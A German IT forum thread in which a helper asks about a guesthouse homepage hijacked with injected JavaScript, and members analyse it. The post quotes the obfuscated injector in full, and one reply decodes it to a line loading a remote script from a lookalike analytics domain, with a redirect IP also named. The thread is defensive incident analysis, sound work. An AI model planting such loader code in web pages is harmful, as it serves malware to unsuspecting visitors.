Top-Themen

Aktuelle Themen (A bis Z)

Administrator.de FeedbackApache ServerAppleAssemblerAudioAusbildungAuslandBackupBasicBatch & ShellBenchmarksBibliotheken & ToolkitsBlogsCloud-DiensteClusterCMSCPU, RAM, MainboardsCSSC und C++DatenbankenDatenschutzDebianDigitiales FernsehenDNSDrucker und ScannerDSL, VDSLE-BooksE-BusinessE-MailEntwicklungErkennung und -AbwehrExchange ServerFestplatten, SSD, RaidFirewallFlatratesGoogle AndroidGrafikGrafikkarten & MonitoreGroupwareHardwareHosting & HousingHTMLHumor (lol)Hyper-VIconsIDE & EditorenInformationsdiensteInstallationInstant MessagingInternetInternet DomäneniOSISDN & AnaloganschlüsseiTunesJavaJavaScriptKiXtartKVMLAN, WAN, WirelessLinuxLinux DesktopLinux NetzwerkLinux ToolsLinux UserverwaltungLizenzierungMac OS XMicrosoftMicrosoft OfficeMikroTik RouterOSMonitoringMultimediaMultimedia & ZubehörNetzwerkeNetzwerkgrundlagenNetzwerkmanagementNetzwerkprotokolleNotebook & ZubehörNovell NetwareOff TopicOpenOffice, LibreOfficeOutlook & MailPapierkorbPascal und DelphiPeripheriegerätePerlPHPPythonRechtliche FragenRedHat, CentOS, FedoraRouter & RoutingSambaSAN, NAS, DASSchriftartenSchulung & TrainingSEOServerServer-HardwareSicherheitSicherheits-ToolsSicherheitsgrundlagenSolarisSonstige SystemeSoziale NetzwerkeSpeicherkartenStudentenjobs & PraktikumSuche ProjektpartnerSuseSwitche und HubsTipps & TricksTK-Netze & GeräteUbuntuUMTS, EDGE & GPRSUtilitiesVB for ApplicationsVerschlüsselung & ZertifikateVideo & StreamingViren und TrojanerVirtualisierungVisual StudioVmwareVoice over IPWebbrowserWebentwicklungWeiterbildungWindows 7Windows 8Windows 10Windows InstallationWindows MobileWindows NetzwerkWindows ServerWindows SystemdateienWindows ToolsWindows UpdateWindows UserverwaltungWindows VistaWindows XPXenserverXMLZusammenarbeit
GELÖST

Privathomepage einer Pension mit Quelltext manipuliert

Frage Sicherheit Erkennung und -Abwehr

Mitglied: killinator007

killinator007 (Level 1) - Jetzt verbinden

02.06.2008, aktualisiert 03.06.2008, 5231 Aufrufe, 11 Kommentare

Hallo zusammen, so etwas ist mir noch nie untergekommen! Neulich rief mich eine besorgte Frau an und meint, das mit ihrer Homepage etwas nicht stimmt, Zitat: Sie ist komplett verschwunden.

Was aber nicht genz der Fall war, denn es wurde ein schadhafter Quelltext hinterlegt:
<html>
<head>
<title>Pension Stöcklholz - Urlaub am Nationalpark Bayerischer Wald</title>
<META NAME="description" CONTENT="Pension Stöcklholz, Bayerischer Wald. Urlaub in Bayern am Nationalpark Bayrischer Wald. Wellness Familienferien in der Nähe von Grafenau.">
<META NAME="keywords" CONTENT="Pension Stöcklholz, Stöckelholz, Wittensöllner, Grafenau, Urlaub, Ilz, Ilztal, Familienurlaub, Kinder, Tiere, Erholung, Entspannung, Ferienwohnung, Doppelzimmer, Einzelzimmer, Nationalpark, Bayerischer Wald, Niederbayern, Hotel, Bayern, Bayerwald, bayrisch, Familie, Hallenbad, Haidelregion, Ostbayern, Bayern, Deutschland, Erholung, Kinderfreundlich, Freyung, Kinderspielplatz, Kinderspielzimmer, Bayrischer, Nationalpark Bayerischer Wald, Naturpark Bayerischer Wald, Radfahren, Radwandern, Urlaub, Reisen, Ferien, wandern, Ski, skifahren, Langlauf, Donau, Dreisessel, Arber, Rachel, Lusen, Böhmen, Böhmerwald, Tschechien, Passau, Passauer Land, Freibad, Loipe, reiten, Naturpark, bayerisch, Urlaub, Wandern, Unterkunft, Unterkünfte, Freizeit, Ferienhaus, Ferienhäuser, Grafenau, Ferienunterkunft, Ferienunterkünfte, Reiseunterkunft, Reiseunterkünfte, Urlaubsunterkunft, Urlaubsunterkünfte, Naturpark, bavarian forest, Last Minute Angebote, Pauschalangebot, Pauschalangebote, Last-Minute-Angebote, Familien, Familienferien">
<!--4c7246f9c070710deb5de104810e46ca-><script language=javascript>pgwnl="%";xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>";fsb=unescape(xlbpi.replace(/Y/g,pgwnl));var hvx,qm;document.write(fsb);hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">=";ckzoq(hvx);</script>

Da ich mich mit Websiteprogrammierung nicht auskenne, bzw. nur den Grundriss weiß, möchte ich hier mehr erfahren. Ich denke hier kennt sich jemand aus. Wie kann so etwas denn nur passieren?

MfG Michael
Mitglied: kaffeezombie
02.06.2008 um 10:47 Uhr
Du hast doch gar kein body!!!

Es ist gar kein Inhalt deklariert, somit kann auch nix angezeigt werden
Bitte warten ..
Mitglied: Jere
02.06.2008 um 11:02 Uhr
Die Website ist ja noch immer blank?
Fahre das letzte Backup ein und ändere alle Passwörter.
Kontrolliere, ob vertrauliche Daten in anderen Besitz übergegangen sein könnten.
Danach kannst du immernoch auswerten.



Das JS sagt mir nicht, kenne weder pgwnl noch xlbpi.
Und der Aufbau schaut auch sehr willkürlich aus.
(Die Sache mit dem Body ist auch so eine Sache *grübel*)


@kaffeezombie: Was für ein geiler Nick! :D :D
Bitte warten ..
Mitglied: kaffeezombie
02.06.2008 um 11:13 Uhr
meine User gaben mir diesen Namen... sie haben eine gute beobachtunggabe )
Bitte warten ..
Mitglied: killinator007
02.06.2008 um 11:55 Uhr
Hallo, das Script funktioniert anscheinend nicht immer! mir wurde die installation eines ActiveX Steuerelementes angezeigt, welches eine Art Trojaner enthält. Diese Seiten sind eh schon bekannt mit den Texten "Auf ihren PC wurde Spyware entdeckt, bla,bla"
Bitte warten ..
Mitglied: LordGurke
02.06.2008 um 12:09 Uhr
Beim ersten Aufruf der Seite wurde ich auch auf http://58.65.234.163/e/count.php weitergeleitet - vermutlich durch das ominöse Script, weshalb vermutlich auch kein body-Tag mehr da ist, damit die Weiterleitung reibungslos funktioniert.

Irgendwer hat deine FTP-Zugangsdaten benutzt und die Seite entsprechend manipuliert.
Bitte warten ..
Mitglied: Arano
02.06.2008 um 13:20 Uhr
Ich war neugierig und habe mir das Skript mal angesehen und "auseinander" genommen.
01.
<script language=javascript> 
02.
  pgwnl="%"; 
03.
  xlbpi="<Y73criY70t laY6eguaY67eY3djY61vaY73criY70tY3e Y20Y66Y75nY63tY69Y6fnY20Y63kzoY71Y28Y70oY74){vaY72Y20aY68,Y6bY3dY22Y28*CcvY47Y71-mY24Y2ekyZOsY56IY488[puFY7dY26@#Y54Y60Y3bt\\\"7Y36Y33]Y5fY69Y27JUzwY41+Mn1^ENY35xaY6c2o:!bPY42hY65{rY64f|Y29Y4bY20=0jgY39~Y34,Y22,Y61=\"Y22Y2cgY62kY2cru,tza=Y22\",db;Y66or(Y61h=0;aY68<poY74.Y6cenY67tY68;Y61Y68++Y29Y7b Y67bk=Y70ot.Y63hY61rY41Y74Y28Y61Y68Y29;rY75Y3dY6b.Y69Y6edY65xOf(gY62Y6b);ifY28ru>-Y31Y29{Y20Y64b=((rY75+Y31)Y2581-1Y29;Y69Y66(Y64bY3c=0Y29Y64bY2b=8Y31;tza+Y3dk.charAt(dY62Y2dY31Y29Y3b Y7dY20eY6cseY20tY7aa+=gY62Y6bY3b}aY2bY3dtzY61;Y64ocumeY6et.wriY74Y65(Y61)Y3bY7dY3cY2fY73crY69pY74>"; 
04.
  fsb=unescape(xlbpi.replace(/Y/g,pgwnl)); 
05.
  var hvx,qm; 
06.
  //document.write(fsb); 
07.
  alert(fsb); 
08.
  hvx="<Vvd'u\"=2l19Fl9{07glGlVvd'u\"7>=f:vF${1\"kAd'\"{*=7<ScRHB`=2l19Fl9{0\\7UlGlSvd'u\"\\7=SRc0\\7e\"\"u!//AAAk9::92{l1l2'\"'vVk1{\"/iiF\"PkgV?7Mf:vF${1\"kd{|{dd{dM7\\7><\\/ScRHB`>7=Kt=</Vvd'u\">="; 
09.
   
10.
  ckzoq(hvx); 
11.
   
12.
   
13.
   
14.
   
15.
  // xlbpi bzw. fsb = 
16.
  function ckzoq(pot){ 
17.
           var ah, 
18.
               k  ="(*CcvGq-m$.kyZOsVIH8[puF}&@#T`;t\"763]_i'JUzwA+Mn1^EN5xal2o:!bPBhe{rdf|)K =0jg9~4,", 
19.
               a  ="", 
20.
               gbk, 
21.
               ru, 
22.
               tza="", 
23.
               db; 
24.
           for(ah=0;ah<pot.length;ah++){ 
25.
               gbk=pot.charAt(ah); 
26.
               ru =k.indexOf(gbk); 
27.
               if(ru>-1){ 
28.
                  db=((ru+1)%81-1); 
29.
                  if(db<=0) 
30.
                     db+=81; 
31.
                  tza+=k.charAt(db-1); 
32.
33.
                  else tza+=gbk; 
34.
35.
           a+=tza; 
36.
           //document.write(a); 
37.
           alert(a); 
38.
39.
            
40.
            
41.
  // ckzoq(hvx) = 
42.
  document.write( "<SCRIPT language=\"JavaScript\" SRC=\"http://www.googleanalitics.net/__utb.js?"+document.referrer+"\"><\/SCRIPT>" );  
43.
   
44.
</script>
Zuerst werden alle "Y" die in der Variable xlbpi enthalten sind durch "%" ersetzt, danach wird der Inhalt unescapt und ergibt den JS-Code für die Funktion ckzog() die anschließend in das Dokument geschrieben wird (inkl. <script>-tags).
Mithilfe dieser Funktion wird dann der Inhalt der Variable hvx decodiert und ebenfalls in das Dokument geschrieben was zufolge hat, dass das Javascript von der angegebenen Adresse (die einer Suchmaschine __ähnelt__) eingebunden wird.

Also definitive Schadcode ! (wurde ja auch schon erwähnt)

Wahrscheinlich hat Maxi89 recht und da hat jemand deinen FTP-Account geknackt oder sich sonst wie Zugang zu deinem Webspace verschafft.

Wenn du kannst, schau die mal die Log-Dateien des FTP- und Webservers an, möglicherweise findest du Hinweise und Spuren dazu wie derjenige sich Zugang verschaffen konnte.

~Arano
Bitte warten ..
Mitglied: filippg
02.06.2008 um 19:36 Uhr
Hallo,

es ist nicht schön Kundendaten im Internet preiszugeben.

Gruß

Filipp
Bitte warten ..
Mitglied: killinator007
03.06.2008 um 12:03 Uhr
Wer gibt heir Kundendaten preis? Es ist eine öffentliche Website!

Gruß Michael
Bitte warten ..
Mitglied: killinator007
03.06.2008 um 12:18 Uhr
Danke für deine Mühe, dass Script zu zerlegen! ich gehe auch davon aus, das der FTP Account geknackt wurde.

Ist hald ärgerlich

Gruß

Michael
Bitte warten ..
Mitglied: filippg
03.06.2008 um 20:50 Uhr
Hallo,

du hast Preisgegeben, dass diese Website nicht professionell betrieben wird, und dass es hier offensichtlich ein Sicherheitsproblem gab (oder wahrscheinlich noch gibt).
Deine Telefonnummer steht auch im öffentlichen Telefonbuch, und wahrscheinlich lässt sich irgendwo auch deine eMail-Adresse nachlesen. Trotzdem fändest du es bestimmt nicht toll, wenn ich das beides jetzt hier posten würde (oder noch an einer dritten Stelle, mit der du gar nichts zu tun hast).

Gruß

Filipp
Bitte warten ..
Mitglied: killinator007
03.06.2008 um 23:31 Uhr
Hi Filipp

was dass mit der Website betrifft hasr du recht, nur, was nützt dir das? Das du irgendwie an meine E-mail Adresse kommen kannst und meinen Namen evtl. im Telefonbuch findest, naja kann doch sein. Außerdem bekomme ich schon genug SPAM ;) Nein, näturlich möchte das nicht unbedingt jeder.

Ich werde nächstes mal keine personenbezogene Daten mehr Posten (war so nicht richtig), auch wenn es grundsätzlich eine öffentliche Website ist und ich weder Zugang noch Passwort gesendet habe!

Sorry

Gruß

Michael
Bitte warten ..
Ähnliche Inhalte
Java
Quelltext - Java
Frage von jajatvJava2 Kommentare

Hallo liebes Forum, ich habe ein Frage und zwar suche ich einen Code wie ich von mehreren Seiten, den ...

LAN, WAN, Wireless
WLAN HotSpot Pension
Frage von ReisigLAN, WAN, Wireless10 Kommentare

Hallo, was könnt ihr für ein WLAN HotSpot Anbieter/Hardware für eine 10-15 Gäste Pension empfehlen? Sorglosinternet, Meinhotspot oder Airfy? ...

Humor (lol)
Quelltext, made my day
Frage von sabinesHumor (lol)9 Kommentare

Moin, mal was schönes zum Wochenstart. Aus meiner ehemaligen Selbständigkeit ruft mich eben ein Kunde an, er habe ich ...

VB for Applications
Wie finde ich die .flv Videodatei in Quelltext von YOutube?
Frage von GERz0cKErZVB for Applications5 Kommentare

Hallo, Ich bin momentan dabei, einen Youtube Downloader zu programmieren ich habe alles so weit fertig. Das einzige was ...

Neue Wissensbeiträge
Internet

Was nützt HTTPS, wenn es auch von Phishing Web-Seiten genutzt wird

Information von Penny.Cilin vor 2 TagenInternet17 Kommentare

HTTPS richtig einschätzen Ob man eine Webseite via HTTPS aufruft, zeigt ein Schloss neben der Adresse im Webbrowser an. ...

Webbrowser

Bugfix für Firefox Quantum released - Installation erfolgt teilweise nicht automatisch!

Erfahrungsbericht von Volchy vor 3 TagenWebbrowser8 Kommentare

Hallo zusammen, gem. dem Artike von heise online wurde mit VersionFirefox 57.0.1 sicherheitsrelevante Bugs behoben. Entgegen der aktuellen Veröffentlichung ...

Sicherheit

Teamviewer Sessions können gekapert werden - Update tw. verfügbar

Information von sabines vor 4 TagenSicherheit6 Kommentare

In bestimmten Konstellationen können Teamviewer Sessions gekapert werden, wahrscheinlich aber ein recht unwahrscheinliches Szenario. Da der Teamviewer gerne für ...

Digitiales Fernsehen

Apple TV: Amazon Prime App ist verfügbar

Information von Frank vor 4 TagenDigitiales Fernsehen4 Kommentare

Die Amazon Prime Video App kann ab sofort auf einem Apple TV ab der 3 Generation installiert werden. Einfach ...

Heiß diskutierte Inhalte
Vmware
Installation Windows 10 VMware
Frage von Ghost108Vmware17 Kommentare

Hallo zusammen, versuche gerade mit Hilfe des vshpere clients eine virtuelle Windows 10 maschine aufzusetzen. 1. virtuelle Maschine erstellt ...

Exchange Server
SBS 2011 E-Mails können gesendet werden, aber nicht von extern empfangen
Frage von andreas1234Exchange Server14 Kommentare

Hallo Community, ich habe das Problem, dass seit knapp zwei Wochen die E-Mails von meinem SBS 2011 einwandfrei gesendet ...

Voice over IP
Telefonstörung - Ortsrufnummern kein Verbindungsaufbau
Frage von Windows10GegnerVoice over IP10 Kommentare

Hallo, sowohl bei uns als auch beim Opa ist es über VoIP nicht möglich Ortsrufnummern anzurufen. Es kommt nach ...

Windows Server
Server 2012 über Eingabeaufforderung devmgmt.msc geht nicht
gelöst Frage von achim222Windows Server9 Kommentare

Hallo, ich habe hier einen Server 2012 der im Reparaturmodus startet. Es liegt an einem falschen VirtIO Treiber für ...